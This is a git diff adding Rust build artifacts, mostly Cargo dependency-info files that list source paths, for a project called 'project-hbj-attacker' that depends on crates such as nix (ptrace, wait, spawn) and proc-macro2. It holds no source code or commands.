+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/ptrace/mod.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/ptrace/linux.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/wait.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/spawn.rs:
diff --git a/01/project-hbj-attacker/target/debug/deps/proc_macro2-0225ebeb9d18aa18.d b/01/project-hbj-attacker/target/debug/deps/proc_macro2-0225ebeb9d18aa18.d
new file mode 100644
index 0000000..94de0bd
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/deps/proc_macro2-0225ebeb9d18aa18.d
@@ -0,0 +1,17 @@
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/proc_macro2-0225ebeb9d18aa18.d: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/proc-macro2-1.0.101/src/lib.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/proc-macro2-1.0.101/src/marker.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/proc-macro2-1.0.101/src/parse.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/proc-macro2-1.0.101/src/probe.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/proc-macro2-1.0.101/src/probe/proc_macro_span_file.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/proc-macro2-1.0.101/src/probe/proc_macro_span_location.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/proc-macro2-1.0.101/src/rcvec.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/proc-macro2-1.0.101/src/detection.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/proc-macro2-1.0.101/src/fallback.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/proc-macro2-1.0.101/src/extra.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/proc-macro2-1.0.101/src/wrapper.rs
+
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/libproc_macro2-0225ebeb9d18aa18.rlib: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/proc-macro2-1.0.101/src/lib.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/proc-macro2-1.0.101/src/marker.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/proc-macro2-1.0.101/src/parse.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/proc-macro2-1.0.101/src/probe.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/proc-macro2-1.0.101/src/probe/proc_macro_span_file.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/proc-macro2-1.0.101/src/probe/proc_macro_span_location.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/proc-macro2-1.0.101/src/rcvec.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/proc-macro2-1.0.101/src/detection.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/proc-macro2-1.0.101/src/fallback.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/proc-macro2-1.0.101/src/extra.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/proc-macro2-1.0.101/src/wrapper.rs
+
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/libproc_macro2-0225ebeb9d18aa18.rmeta: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/proc-macro2-1.0.101/src/lib.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/proc-macro2-1.0.101/src/marker.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/proc-macro2-1.0.101/src/parse.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/proc-macro2-1.0.101/src/probe.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/proc-macro2-1.0.101/src/probe/proc_macro_span_file.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/proc-macro2-1.0.101/src/probe/proc_macro_span_location.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/proc-macro2-1.0.101/src/rcvec.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/proc-macro2-1.0.101/src/detection.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/proc-macro2-1.0.101/src/fallback.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/proc-macro2-1.0.101/src/extra.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/proc-macro2-1.0.101/src/wrapper.rs
+
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/proc-macro2-1.0.101/src/lib.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/proc-macro2-1.0.101/src/marker.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/proc-macro2-1.0.101/src/parse.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/proc-macro2-1.0.101/src/probe.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/proc-macro2-1.0.101/src/probe/proc_macro_span_file.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/proc-macro2-1.0.101/src/probe/proc_macro_span_location.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/proc-macro2-1.0.101/src/rcvec.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/proc-macro2-1.0.101/src/detection.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/proc-macro2-1.0.101/src/fallback.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/proc-macro2-1.0.101/src/extra.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/proc-macro2-1.0.101/src/wrapper.rs:
diff --git a/01/project-hbj-attacker/target/debug/deps/proc_macro_error2-55e4f1d46a8a5c63.d b/01/project-hbj-attacker/target/debug/deps/proc_macro_error2-55e4f1d46a8a5c63.d
new file mode 100644
index 0000000..a0c813a
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/deps/proc_macro_error2-55e4f1d46a8a5c63.d
@@ -0,0 +1,12 @@
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/proc_macro_error2-55e4f1d46a8a5c63.d: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/proc-macro-error2-2.0.1/src/lib.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/proc-macro-error2-2.0.1/src/dummy.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/proc-macro-error2-2.0.1/src/diagnostic.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/proc-macro-error2-2.0.1/src/macros.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/proc-macro-error2-2.0.1/src/sealed.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/proc-macro-error2-2.0.1/src/imp/fallback.rs
+
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/libproc_macro_error2-55e4f1d46a8a5c63.rlib: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/proc-macro-error2-2.0.1/src/lib.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/proc-macro-error2-2.0.1/src/dummy.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/proc-macro-error2-2.0.1/src/diagnostic.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/proc-macro-error2-2.0.1/src/macros.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/proc-macro-error2-2.0.1/src/sealed.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/proc-macro-error2-2.0.1/src/imp/fallback.rs
+
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/libproc_macro_error2-55e4f1d46a8a5c63.rmeta: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/proc-macro-error2-2.0.1/src/lib.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/proc-macro-error2-2.0.1/src/dummy.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/proc-macro-error2-2.0.1/src/diagnostic.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/proc-macro-error2-2.0.1/src/macros.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/proc-macro-error2-2.0.1/src/sealed.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/proc-macro-error2-2.0.1/src/imp/fallback.rs
+
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/proc-macro-error2-2.0.1/src/lib.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/proc-macro-error2-2.0.1/src/dummy.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/proc-macro-error2-2.0.1/src/diagnostic.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/proc-macro-error2-2.0.1/src/macros.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/proc-macro-error2-2.0.1/src/sealed.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/proc-macro-error2-2.0.1/src/imp/fallback.rs:
diff --git a/01/project-hbj-attacker/target/debug/deps/proc_macro_error_attr2-eaefd73d796b2801.d b/01/project-hbj-attacker/target/debug/deps/proc_macro_error_attr2-eaefd73d796b2801.d
new file mode 100644
index 0000000..377a954
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/deps/proc_macro_error_attr2-eaefd73d796b2801.d
@@ -0,0 +1,7 @@
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/proc_macro_error_attr2-eaefd73d796b2801.d: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/proc-macro-error-attr2-2.0.0/src/lib.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/proc-macro-error-attr2-2.0.0/src/parse.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/proc-macro-error-attr2-2.0.0/src/settings.rs
+
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/libproc_macro_error_attr2-eaefd73d796b2801.so: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/proc-macro-error-attr2-2.0.0/src/lib.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/proc-macro-error-attr2-2.0.0/src/parse.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/proc-macro-error-attr2-2.0.0/src/settings.rs
+
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/proc-macro-error-attr2-2.0.0/src/lib.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/proc-macro-error-attr2-2.0.0/src/parse.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/proc-macro-error-attr2-2.0.0/src/settings.rs:
diff --git a/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-03476cb36fbc5238.d b/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-03476cb36fbc5238.d
new file mode 100644
index 0000000..4bccae6
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-03476cb36fbc5238.d
@@ -0,0 +1,8 @@
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-03476cb36fbc5238.d: src/main.rs src/helper.rs src/helper/map.rs src/helper/processes.rs
+
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/libproject_hbj_attacker-03476cb36fbc5238.rmeta: src/main.rs src/helper.rs src/helper/map.rs src/helper/processes.rs
+
+src/main.rs:
+src/helper.rs:
+src/helper/map.rs:
+src/helper/processes.rs:
diff --git a/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-0531b6d159b9dc84.d b/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-0531b6d159b9dc84.d
new file mode 100644
index 0000000..b2d9bef
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-0531b6d159b9dc84.d
@@ -0,0 +1,5 @@
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-0531b6d159b9dc84.d: src/lib.rs
+
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/libproject_hbj_attacker-0531b6d159b9dc84.rmeta: src/lib.rs
+
+src/lib.rs:
diff --git a/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-0dae6fb844b6e156.d b/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-0dae6fb844b6e156.d
new file mode 100644
index 0000000..c4ed7aa
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-0dae6fb844b6e156.d
@@ -0,0 +1,8 @@
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-0dae6fb844b6e156.d: src/main.rs src/helper.rs src/helper/map.rs src/helper/processes.rs
+
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/libproject_hbj_attacker-0dae6fb844b6e156.rmeta: src/main.rs src/helper.rs src/helper/map.rs src/helper/processes.rs
+
+src/main.rs:
+src/helper.rs:
+src/helper/map.rs:
+src/helper/processes.rs:
diff --git a/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-115c34231582b5ff b/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-115c34231582b5ff
new file mode 100755
index 0000000..176dc88
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-115c34231582b5ff differ
diff --git a/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-115c34231582b5ff.d b/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-115c34231582b5ff.d
new file mode 100644
index 0000000..9dac34a
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-115c34231582b5ff.d
@@ -0,0 +1,8 @@
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-115c34231582b5ff.d: src/main.rs src/helper.rs src/helper/map.rs src/helper/processes.rs
+
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-115c34231582b5ff: src/main.rs src/helper.rs src/helper/map.rs src/helper/processes.rs
+
+src/main.rs:
+src/helper.rs:
+src/helper/map.rs:
+src/helper/processes.rs:
diff --git a/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-138dced13c0ab27a.d b/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-138dced13c0ab27a.d
new file mode 100644
index 0000000..7ab213b
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-138dced13c0ab27a.d
@@ -0,0 +1,8 @@
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-138dced13c0ab27a.d: src/main.rs src/helper.rs src/helper/map.rs src/helper/processes.rs
+
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/libproject_hbj_attacker-138dced13c0ab27a.rmeta: src/main.rs src/helper.rs src/helper/map.rs src/helper/processes.rs
+
+src/main.rs:
+src/helper.rs:
+src/helper/map.rs:
+src/helper/processes.rs:
diff --git a/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-16fc8141eb52a768.d b/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-16fc8141eb52a768.d
new file mode 100644
index 0000000..3196898
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-16fc8141eb52a768.d
@@ -0,0 +1,5 @@
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-16fc8141eb52a768.d: src/main.rs
+
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/libproject_hbj_attacker-16fc8141eb52a768.rmeta: src/main.rs
+
+src/main.rs:
diff --git a/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-187f40608df38efc.d b/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-187f40608df38efc.d
new file mode 100644
index 0000000..f35420d
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-187f40608df38efc.d
@@ -0,0 +1,8 @@
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-187f40608df38efc.d: src/main.rs src/helper.rs src/helper/map.rs src/helper/processes.rs
+
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/libproject_hbj_attacker-187f40608df38efc.rmeta: src/main.rs src/helper.rs src/helper/map.rs src/helper/processes.rs
+
+src/main.rs:
+src/helper.rs:
+src/helper/map.rs:
+src/helper/processes.rs:
diff --git a/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-206306ee5eb62a04.d b/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-206306ee5eb62a04.d
new file mode 100644
index 0000000..ff072a3
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-206306ee5eb62a04.d
@@ -0,0 +1,5 @@
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-206306ee5eb62a04.d: src/lib.rs
+
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/libproject_hbj_attacker-206306ee5eb62a04.rmeta: src/lib.rs
+
+src/lib.rs:
diff --git a/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-2278d8080922a319.d b/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-2278d8080922a319.d
new file mode 100644
index 0000000..f27f9b7
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-2278d8080922a319.d
@@ -0,0 +1,8 @@
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-2278d8080922a319.d: src/main.rs src/helper.rs src/helper/map.rs src/helper/processes.rs
+
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/libproject_hbj_attacker-2278d8080922a319.rmeta: src/main.rs src/helper.rs src/helper/map.rs src/helper/processes.rs
+
+src/main.rs:
+src/helper.rs:
+src/helper/map.rs:
+src/helper/processes.rs:
diff --git a/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-23ee938670df2767 b/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-23ee938670df2767
new file mode 100755
index 0000000..2a49ef8
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-23ee938670df2767 differ
diff --git a/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-23ee938670df2767.d b/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-23ee938670df2767.d
new file mode 100644
index 0000000..8610349
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-23ee938670df2767.d
@@ -0,0 +1,8 @@
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-23ee938670df2767.d: src/main.rs src/helper.rs src/helper/map.rs src/helper/processes.rs
+
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-23ee938670df2767: src/main.rs src/helper.rs src/helper/map.rs src/helper/processes.rs
+
+src/main.rs:
+src/helper.rs:
+src/helper/map.rs:
+src/helper/processes.rs:
diff --git a/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-2551d0c3b2f656cb b/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-2551d0c3b2f656cb
new file mode 100755
index 0000000..039c099
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-2551d0c3b2f656cb differ
diff --git a/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-2551d0c3b2f656cb.d b/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-2551d0c3b2f656cb.d
new file mode 100644
index 0000000..0e4df39
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-2551d0c3b2f656cb.d
@@ -0,0 +1,8 @@
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-2551d0c3b2f656cb.d: src/main.rs src/helper.rs src/helper/map.rs src/helper/processes.rs
+
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-2551d0c3b2f656cb: src/main.rs src/helper.rs src/helper/map.rs src/helper/processes.rs
+
+src/main.rs:
+src/helper.rs:
+src/helper/map.rs:
+src/helper/processes.rs:
diff --git a/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-28644bcd824d9d0c.d b/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-28644bcd824d9d0c.d
new file mode 100644
index 0000000..f0e476e
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-28644bcd824d9d0c.d
@@ -0,0 +1,5 @@
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-28644bcd824d9d0c.d: src/main.rs
+
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/libproject_hbj_attacker-28644bcd824d9d0c.rmeta: src/main.rs
+
+src/main.rs:
diff --git a/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-35a108fdfad73814.d b/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-35a108fdfad73814.d
new file mode 100644
index 0000000..f9202c1
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-35a108fdfad73814.d
@@ -0,0 +1,8 @@
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-35a108fdfad73814.d: src/main.rs src/helper.rs src/helper/map.rs src/helper/processes.rs
+
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/libproject_hbj_attacker-35a108fdfad73814.rmeta: src/main.rs src/helper.rs src/helper/map.rs src/helper/processes.rs
+
+src/main.rs:
+src/helper.rs:
+src/helper/map.rs:
+src/helper/processes.rs:
diff --git a/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-35cbea8aa5b55547 b/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-35cbea8aa5b55547
new file mode 100755
index 0000000..5f58e8f
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-35cbea8aa5b55547 differ
diff --git a/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-35cbea8aa5b55547.d b/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-35cbea8aa5b55547.d
new file mode 100644
index 0000000..c615358
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-35cbea8aa5b55547.d
@@ -0,0 +1,8 @@
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-35cbea8aa5b55547.d: src/main.rs src/helper.rs src/helper/map.rs src/helper/processes.rs
+
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-35cbea8aa5b55547: src/main.rs src/helper.rs src/helper/map.rs src/helper/processes.rs
+
+src/main.rs:
+src/helper.rs:
+src/helper/map.rs:
+src/helper/processes.rs:
diff --git a/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-39794b693e707518.d b/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-39794b693e707518.d
new file mode 100644
index 0000000..e1680f4
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-39794b693e707518.d
@@ -0,0 +1,8 @@
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-39794b693e707518.d: src/main.rs src/helper.rs src/helper/map.rs src/helper/processes.rs
+
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/libproject_hbj_attacker-39794b693e707518.rmeta: src/main.rs src/helper.rs src/helper/map.rs src/helper/processes.rs
+
+src/main.rs:
+src/helper.rs:
+src/helper/map.rs:
+src/helper/processes.rs:
diff --git a/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-3e048006053403e8.d b/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-3e048006053403e8.d
new file mode 100644
index 0000000..df858b8
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-3e048006053403e8.d
@@ -0,0 +1,8 @@
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-3e048006053403e8.d: src/main.rs src/helper.rs src/helper/map.rs src/helper/processes.rs
+
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/libproject_hbj_attacker-3e048006053403e8.rmeta: src/main.rs src/helper.rs src/helper/map.rs src/helper/processes.rs
+
+src/main.rs:
+src/helper.rs:
+src/helper/map.rs:
+src/helper/processes.rs:
diff --git a/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-4a94058ae5fb6c1b.d b/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-4a94058ae5fb6c1b.d
new file mode 100644
index 0000000..43045b2
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-4a94058ae5fb6c1b.d
@@ -0,0 +1,8 @@
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-4a94058ae5fb6c1b.d: src/main.rs src/helper.rs src/helper/map.rs src/helper/processes.rs
+
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/libproject_hbj_attacker-4a94058ae5fb6c1b.rmeta: src/main.rs src/helper.rs src/helper/map.rs src/helper/processes.rs
+
+src/main.rs:
+src/helper.rs:
+src/helper/map.rs:
+src/helper/processes.rs:
diff --git a/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-4eda4ecb58543ea6.d b/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-4eda4ecb58543ea6.d
new file mode 100644
index 0000000..3dd747a
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-4eda4ecb58543ea6.d
@@ -0,0 +1,5 @@
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-4eda4ecb58543ea6.d: src/lib.rs
+
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/libproject_hbj_attacker-4eda4ecb58543ea6.rmeta: src/lib.rs
+
+src/lib.rs:
diff --git a/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-53852b4f0048cbb7.d b/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-53852b4f0048cbb7.d
new file mode 100644
index 0000000..6f95a5f
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-53852b4f0048cbb7.d
@@ -0,0 +1,8 @@
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-53852b4f0048cbb7.d: src/main.rs src/helper.rs src/helper/map.rs src/helper/processes.rs
+
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/libproject_hbj_attacker-53852b4f0048cbb7.rmeta: src/main.rs src/helper.rs src/helper/map.rs src/helper/processes.rs
+
+src/main.rs:
+src/helper.rs:
+src/helper/map.rs:
+src/helper/processes.rs:
diff --git a/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-5a494607dc84530f.d b/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-5a494607dc84530f.d
new file mode 100644
index 0000000..62d592f
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-5a494607dc84530f.d
@@ -0,0 +1,8 @@
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-5a494607dc84530f.d: src/main.rs src/helper.rs src/helper/map.rs src/helper/processes.rs
+
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/libproject_hbj_attacker-5a494607dc84530f.rmeta: src/main.rs src/helper.rs src/helper/map.rs src/helper/processes.rs
+
+src/main.rs:
+src/helper.rs:
+src/helper/map.rs:
+src/helper/processes.rs:
diff --git a/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-6511559cb3af9165.d b/01/project-hbj-attacker/target/debug/deps/project_hbj_attacker-6511559cb3af9165.d
new file mode 100644
index 0000000..fdb63c0
--- /dev/null
